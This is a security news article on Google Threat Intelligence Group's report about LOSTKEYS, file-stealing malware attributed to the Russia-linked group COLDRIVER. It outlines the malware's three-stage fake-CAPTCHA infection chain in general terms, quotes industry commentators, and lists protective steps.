A new malware called LOSTKEYS, capable of stealing files and system data, has been identified by Google’s Threat Intelligence Group (GTIG) as part of a series of cyber-attacks attributed to COLDRIVER – a threat actor linked to the Russian government.
The malware, observed in attacks during January, March and April 2025, marks a new step in COLDRIVER’s evolving capabilities.
Previously known primarily for credential phishing targeting Western diplomats, NGOs and intelligence personnel, the group is now deploying more advanced malware tools to compromise victim devices directly.
“This is yet another example showing that credential theft is an ongoing area of risk, as even the strongest passwords can be captured by this kind of malware attack,” said Darren Siegel, lead sales engineer at Outpost24.
“While obviously the ideal outcome here would be to prevent such attacks from occurring in the first place, it underscores the need for organizations to implement continuous monitoring for compromised credentials.”
LOSTKEYS Multi-Stage Infection Chain
LOSTKEYS is delivered through a complex, three-stage infection process. It starts with a fake CAPTCHA on a lure website that tricks users into pasting and running a PowerShell script.
A second stage follows, designed to evade virtual machines by checking the MD5 hash of screen resolution. The third stage downloads and decodes the final payload using a two-key substitution cipher and a Visual Basic Script decoder.
GTIG’s analysis shows each infection chain is customized with unique identifiers and encryption keys, indicating a tailored approach for each target.
In addition to credential theft, the deployment of malware like LOSTKEYS is believed to occur only in particularly high-value scenarios.
“There can be no doubt that intelligence gathering and cyber warfare are taking place at the nation-state level and will probably do so for the foreseeable future,” said Erich Kron, security awareness advocate at KnowBe4.
“This is simply the digital version of a spy sneaking in a micro camera and taking pictures of sensitive information.”
Investigators also uncovered earlier versions of LOSTKEYS dating back to December 2023.
These earlier samples masqueraded as files related to the software Maltego and used a different infection method. GTIG has not confirmed whether these samples were also deployed by COLDRIVER.
Protecting Potential Targets
GTIG urges at-risk users to enroll in Google’s Advanced Protection Program and enable Enhanced Safe Browsing in Chrome.
The group has added all malicious websites and files related to LOSTKEYS to Safe Browsing and has issued direct alerts to affected Gmail and Workspace users.
“We are committed to sharing our findings with the security community to raise awareness and with companies and individuals that might have been targeted by these activities,” GTIG stated.
“We hope that improved understanding of tactics and techniques will enhance threat hunting capabilities and lead to stronger user protections across the industry.”
